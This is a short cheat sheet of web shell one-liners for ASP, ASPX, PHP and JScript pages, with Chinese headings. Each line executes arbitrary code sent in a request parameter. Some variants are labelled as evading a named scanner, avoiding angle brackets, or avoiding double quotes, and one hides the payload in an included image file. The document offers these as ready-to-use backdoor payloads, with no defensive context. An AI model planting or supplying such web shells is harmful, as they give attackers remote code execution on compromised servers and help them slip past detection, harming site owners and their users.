images
<!--#include file="images\1.jpg" -->

<%eval request("3")%>

<%execute request("3")%>

<%execute(request("3"))%>

<%If Request("3")<>"" Then Execute(Request("3"))%>

<%if request ("3")<>""then session("3")=request("3"):end if:if session("3")<>"" then execute session

("3")%>

<SCRIPT language=VBScript runat="server">execute request("3")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["3"],"unsafe");%>

asp一句话
<%execute(request("3"))%>

php一句话
<?php eval($_POST[3]);?>

aspx一句话
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>


可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<,>'的asp一句话
<script language=VBScript runat=server>execute request("1")</script>

不用双引号的一句话。
<%eval request(chr(35))%>